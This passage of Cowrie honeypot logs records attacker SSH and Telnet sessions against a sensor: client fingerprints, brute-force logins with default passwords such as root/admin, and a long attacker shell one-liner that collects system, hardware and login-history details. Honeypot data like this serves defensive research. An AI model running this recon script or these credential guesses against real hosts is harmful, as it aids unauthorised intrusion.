cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:32:07.034692Z","src_ip":"51.79.164.132","session":"f85ad5f7dfc6"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:32:08.460776Z","src_ip":"51.79.164.132","session":"f85ad5f7dfc6"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:32:09.167331Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:32:09.990204Z","src_ip":"51.79.164.132","session":"f85ad5f7dfc6"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":54890,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d3442735ae6","protocol":"telnet","message":"New connection: 176.65.149.186:54890 (1.2.3.4:23) [session: 7d3442735ae6]","sensor":"my-vps","timestamp":"2025-08-28T08:32:10.952133Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:32:10.988429Z","src_ip":"176.65.149.186","session":"7d3442735ae6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:32:11.388563Z","src_ip":"176.65.149.186","session":"7d3442735ae6"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T08:32:11.389654Z","src_ip":"176.65.149.186","session":"7d3442735ae6"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T08:32:11.390308Z","src_ip":"176.65.149.186","session":"7d3442735ae6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:32:13.892815Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.893899Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.895022Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.896087Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.897515Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.898173Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.898862Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.900434Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.900962Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.901486Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.902176Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.902804Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:32:13.903394Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:32:17.203087Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"3.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:32:17.204002Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.session.closed","duration":"24.4","message":"Connection lost after 24.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:32:17.226908Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38628,"dst_ip":"1.2.3.4","dst_port":22,"session":"da07bd37c53e","protocol":"ssh","message":"New connection: 51.79.164.132:38628 (1.2.3.4:22) [session: da07bd37c53e]","sensor":"my-vps","timestamp":"2025-08-28T08:32:33.032362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:32:33.129088Z","src_ip":"51.79.164.132","session":"da07bd37c53e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:32:33.690572Z","src_ip":"51.79.164.132","session":"da07bd37c53e"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T08:32:35.224228Z","src_ip":"51.79.164.132","session":"da07bd37c53e"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:32:36.760017Z","src_ip":"51.79.164.132","session":"da07bd37c53e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43932,"dst_ip":"1.2.3.4","dst_port":22,"session":"130b71c0cfe4","protocol":"ssh","message":"New connection: 51.79.164.132:43932 (1.2.3.4:22) [session: 130b71c0cfe4]","sensor":"my-vps","timestamp":"2025-08-28T08:32:59.600841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:33:00.069735Z","src_ip":"51.79.164.132","session":"130b71c0cfe4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:33:00.070419Z","src_ip":"51.79.164.132","session":"130b71c0cfe4"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T08:33:01.753958Z","src_ip":"51.79.164.132","session":"130b71c0cfe4"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:03.287529Z","src_ip":"51.79.164.132","session":"130b71c0cfe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57876,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10966712e3a","protocol":"ssh","message":"New connection: 212.227.125.160:57876 (1.2.3.4:22) [session: d10966712e3a]","sensor":"my-vps","timestamp":"2025-08-28T08:33:04.037753Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26931,"dst_ip":"1.2.3.4","dst_port":22,"session":"53f933f7acc2","protocol":"ssh","message":"New connection: 212.227.235.229:26931 (1.2.3.4:22) [session: 53f933f7acc2]","sensor":"my-vps","timestamp":"2025-08-28T08:33:04.934762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:33:05.136626Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:33:05.397624Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:33:06.227822Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.login.success","username":"root","password":"09090909","message":"login attempt [root/09090909] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:33:07.341390Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:08.595555Z","src_ip":"79.124.8.120","session":"7d245020fdd1"}
{"eventid":"cowrie.session.closed","duration":180.07059168815613,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:08.599592Z","src_ip":"79.124.8.120","session":"7d245020fdd1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:33:08.662254Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T08:33:08.662964Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:33:08.748440Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:09.408233Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:09.771657Z","src_ip":"212.227.235.229","session":"53f933f7acc2"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:33:20.240595Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.session.connect","src_ip":"47.121.133.27","src_port":39292,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8eec5a11144","protocol":"ssh","message":"New connection: 47.121.133.27:39292 (1.2.3.4:22) [session: b8eec5a11144]","sensor":"my-vps","timestamp":"2025-08-28T08:33:21.372025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:33:21.372831Z","src_ip":"47.121.133.27","session":"b8eec5a11144"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:33:21.608138Z","src_ip":"47.121.133.27","session":"b8eec5a11144"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42090,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea4d17f29b07","protocol":"ssh","message":"New connection: 51.79.164.132:42090 (1.2.3.4:22) [session: ea4d17f29b07]","sensor":"my-vps","timestamp":"2025-08-28T08:33:25.980206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:33:26.235067Z","src_ip":"51.79.164.132","session":"ea4d17f29b07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@o